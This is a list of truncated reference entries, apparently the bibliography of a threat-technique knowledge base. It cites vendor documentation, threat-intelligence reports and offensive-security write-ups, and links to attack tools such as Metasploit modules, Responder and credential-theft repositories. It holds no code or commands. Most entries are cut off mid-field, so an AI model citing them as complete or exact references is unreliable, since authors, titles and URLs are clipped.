cisco_depl Cisco. (202https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-b
AADInternaDr. Nestorihttps://aadinternals.com/post/deviceidentity/
Kaspersky Kaspersky Lhttps://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/s
Microsoft Microsoft. https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Public-key_cryptography
FreejackedClark, Michhttps://sysdig.com/blog/googles-vertex-ai-platform-freejacked/
NYTStuxneWilliam J. https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
Medium Det French, D. https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141b
Jacobsen 2Jacobsen, https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2
MSDN WMMicrosoft. https://msdn.microsoft.com/en-us/library/aa394582.aspx
Microsoft Microsoft. https://learn.microsoft.com/en-us/windows/win32/winrm/portal
AWS Root Amazon. (n.https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
Metasploitundefined.https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh
Github W3Lundgren, https://github.com/scottlundgren/w32time
Microsoft Mathers, Bhttps://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-t
Microsoft Microsoft. https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-t
Trap Manuss64. (n.d. https://ss64.com/bash/trap.html
Cyberciti Cyberciti. https://bash.cyberciti.biz/guide/Trap_statement
Man LD.SOKerrisk, M.https://www.man7.org/linux/man-pages/man8/ld.so.8.html
TLDP ShareThe Linux Dhttps://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
Apple DocoApple Inc.. https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibra
Baeldung baeldung. https://www.baeldung.com/linux/ld_preload-trick-what-is
Code Injec Itamar Turnhttps://www.datawire.io/code-injection-on-linux-and-macos/
Uninformeskape. (20 http://hick.org/code/skape/papers/needle.txt
Phrack hal halflife. ( http://phrack.org/issues/51/8.html
Brown ExploTim Brown.http://www.nth-dimension.org.uk/pub/BTL.pdf
TheEvilBit Fitzl, C. ( https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/
Timac DYL Timac. (20 https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/
Gabilondo Jon Gabilonhttps://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc
cisco_use Cisco. (20 https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047
KubernetesKubernetes. https://kubernetes.io/docs/concepts/security/service-accounts/
Microsoft Lich, B., M https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720
ESET SedniCalvet, J. http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/
Microsoft Microsoft. https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog
Microsoft Microsoft. https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx
Microsoft Plett, C. et https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil
Trend MicrAntazo, F. https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service
Rapid7 LL Francois, Rhttps://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
GitHub Re Gaffie, L. https://github.com/SpiderLabs/Responder
Secure Ide Kuehn, E. https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
TechNet NMicrosoft. https://technet.microsoft.com/library/cc958811.aspx
GitHub NBNomex. (20https://github.com/nomex/nbnspoof
GitHub ConRobertson,https://github.com/Kevin-Robertson/Conveigh
byt3bl33d3Salvati, M. https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-
SternsecurSternstein https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
falconoverFalcon Ovehttps://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/
bad_luck_bKaspersky https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf
fsutil_behaMicrosoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior
blackmattePereira, T. https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html
new_rust_Symantec Thttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-r
Deep Insti Gilboa, A. https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2
Volexity E Gruzweig, Jhttps://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnera
Symantec ASymantec. https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf
TechNet BlWilson, B. https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928
Botnet ScaDainotti, A https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
OWASP Fing OWASP Wiki https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
Microsoft Mathers, B.https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012
GTFOBins SEmilio Pinnhttps://gtfobins.github.io/#+suid
setuid manMichael Kehttp://man7.org/linux/man-pages/man2/setuid.2.html
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp
Microsoft Microsoft. https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx
Enigma DCNelson, M.https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
Enigma ExcNelson, M.https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
Cyberreas Tsukerman,https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom
Trimarc DeMetcalf, S. https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spray
BlackHillsI Thyer, J. ( http://www.blackhillsinfosec.com/?p=4645
Trend MicrWilhoit, K. http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/
Azure Acti Dr. Nestorihttps://o365blog.com/post/just-looking/
GitHub Offgremwell. https://github.com/gremwell/o365enum
HackersAriHackers Arihttps://www.hackers-arise.com/email-scraping-and-maltego
Avertium ca Avertium. https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phis
BOA Telep Bank of Amhttps://business.bofa.com/en-us/content/what-is-vishing.html
PassLib msEli Collin https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html
ired mscacMantvydashttps://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-m
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012
Venafi SSHBlachman, https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-
Google ClouChris Mober https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform
cisco_ip_ Cisco. (202https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254
Cybereaso Cybereasonhttps://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability
Google CloGoogle Clohttps://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata
Azure UpdaMicrosoft. https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update
SSH Authorssh.com. (nhttps://www.ssh.com/ssh/authorized_keys/
Nmap Firew Nmap. (n.d.https://nmap.org/book/firewalls.html
Microsoft Shanbhag, https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/
Microsoft Microsoft. https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview
Microsoft SMarshall, Dhttps://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit
Oddvar MoMoe, O. (20https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-fr
Tilbury 20 Tilbury, C. http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/
FSecure HuFSecure. ( https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml
Symantec USymantec. https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2
Microsoft Microsoft. https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017
LOLBAS OdLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
TrendMicroBermejo, L.https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-rus
TrendMicroGiagone, R.https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-87
SecurityTraBorges, E. https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
ExploitDB Offensive Shttps://www.exploit-db.com/google-hacking-database
AWS PassRAWS. (n.d.)https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html
Google CloGoogle Clou https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project
Google CloGoogle Clou https://cloud.google.com/iam/docs/service-account-permissions
Microsoft Microsoft. https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-an
Azure Just Microsoft. https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-i
Rhino GooglSpencer Giehttps://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
Hunters DoYonatan Khhttps://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-dele
Palo Alto Zohar Zigdohttps://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/
objective- Patrick Warhttps://objective-see.com/blog/blog_0x25.html
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx
BlackHat PLiberman, https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelga
hasherezadhasherezadhttps://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-proces
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx
AWS CloudT Amazon. (n.https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
Cloud AudiGoogle. (n.https://cloud.google.com/logging/docs/audit#admin-activity
Azure ActivMicrosoft. https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
GitHub ClouRuna A. Sanhttps://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-crede
mozilla_se Robert Kughttps://www.mozilla.org/en-US/security/advisories/mfsa2012-98/
ExecutableStefan Kanthttps://seclists.org/fulldisclosure/2015/Dec/34
Narrator AcComi, G. (2https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
FireEye HikGlyer, C., https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techn
DEFCON2016 Maldonado, https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom
Sysdig ProxCrystal Morhttps://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
Unit 42 Le Margaret Khttps://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
GoBotKR Zuzana Hromcová.https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
(2019, July 8). Malicious campaign targets South Korean users with backdoor ‑laced torrents. Ret
AWS List UAmazon. (n.https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
Google ClouGoogle. (20https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
Remote She Abdou Rockhttps://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python
Powershel Microsoft. https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?vie
LemonDucManoj Ahujhttps://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/
Microsoft Microsoft. https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:W
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events
Medium Eve Palantir. https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense
Savill 1999Savill, J. https://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference
Microsoft Florio, E.. https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysu
AdSecurityMetcalf, S. https://adsecurity.org/?p=1588
Microsoft TMicrosoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=
Microsoft GMicrosoft. https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltru
Harmj0y DoSchroeder,https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944
AdSecurityMetcalf, S https://adsecurity.org/?p=1640
ADSecuritySean Metcahttps://adsecurity.org/?p=483
ESET GamaBoutin, J. https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/
Infosecins Security Nihttps://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/
Trend MicrAlintanahi https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-g
Kaspersky Firsh, A.. https://securelist.com/zero-day-vulnerability-in-telegram/83800/
FireEyeSupFireEye. ( https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
SanDisk S SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018.
SmartMontsmartmonto https://www.smartmontools.org/
ITWorld HaPinola, M. https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-
MSDN VBAAustin,
i J. https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
Hexacorn OHexacorn. (http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
Microsoft Microsoft. https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab7
enigma0x3Nelson, M.https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
Atlassian Atlassian. https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
Campbell Campbell, Chttp://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-
GentilKiwi Deply, B. ( https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the
ADSecurityMetcalf, S. https://adsecurity.org/?p=556
Stealthbit Warren, J. https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
Docker ExeDocker. (n.https://docs.docker.com/engine/reference/commandline/exec/
Docker EntDocker. (n.https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime
Docker Da Docker. (n.https://docs.docker.com/engine/reference/commandline/dockerd/
Kubectl ExeThe Kuberne https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/
KubernetesThe Kuberne https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/
Windows CTomonaga,https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
Fysbis Dr Doctor Web https://vms.drweb.com/virus/?i=4276269
Systemd SeFreedesktop https://www.freedesktop.org/software/systemd/man/systemd.service.html
TechNet ScMicrosoft. https://technet.microsoft.com/en-us/library/bb490996.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx
CyberBit EaGavriel, H. https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/
ENSIL Ato Liberman, https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx
Cisco Traff Cisco. (n.d https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/
Juniper TraJuniper. ( https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html
eset_osx_fESET. (2012https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf
fileinfo pli FileInfo.co https://fileinfo.com/extension/plist
wardle chpPatrick Warhttps://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf
SysinternalMicrosoft. https://forum.sysinternals.com/appcertdlls_topic12546.html
Mac ForwarApple. (n.dhttps://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac
PWC CloudPwC and BAE https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hoppe
GitHub GhoHarmJ0y. (2https://github.com/GhostPack/SharpDPAPI#certificates
Microsoft Microsoft. https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh83
Medium Cer Schroeder,https://posts.specterops.io/certified-pre-owned-d95910965cd2
SpecterOpsSchroeder,https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Ow
O365 Blog Syynimaa, N https://o365blog.com/post/deviceidentity/
GitHub CerTheWover.https://github.com/TheWover/CertStealer
(
APT29 Deep Thibault V https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
CISA MFA PCybersecurihttps://www.cisa.gov/uscert/ncas/alerts/aa22-074a
AADInternal Dr. Nestorihttps://o365blog.com/post/mdm
AADInternaDr. Nestorihttps://o365blog.com/post/bprt/
AADInternal Dr. Nestorihttps://o365blog.com/post/devices/
DarkReadinKelly Jacks https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery
Microsoft -Microsoft 3https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-t
Amazon AW Amazon. (nhttps://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html
Microsoft Annamalai,https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview
Google VPCGoogle. (20https://cloud.google.com/vpc/docs/vpc
FireEye DNHirani, M., https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-man
ICANNDoma ICANN Secur https://www.icann.org/groups/ssac/documents/sac-007-en
Talos DNSpMercer, W.https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
FireEye EP Winters, R.https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12
Beek Use oBeek, C. (2 https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316
Outflank Hegt, S. (2 https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/
Intezer Ru Kennedy, J.https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/
Microsoft ZMicrosoft. https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-25
Disable au wordmann.https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Booting
Docker BuiDocker. ( nhttps://docs.docker.com/engine/api/v1.41/#operation/ImageBuild
Aqua SecurTeam Nautil https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pd
BOHOPS Abu BOHOPS. (20 https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evas
Red CanaryHaag, M., Lhttps://redcanary.com/blog/verclsid-exe-threat-detection/
LOLBAS VerLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Verclsid/
Nick Tyrer Tyrer, N. ( https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
WinOSBiteverclsid-exe. https://www.winosbite.com/verclsid-exe/
(2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2
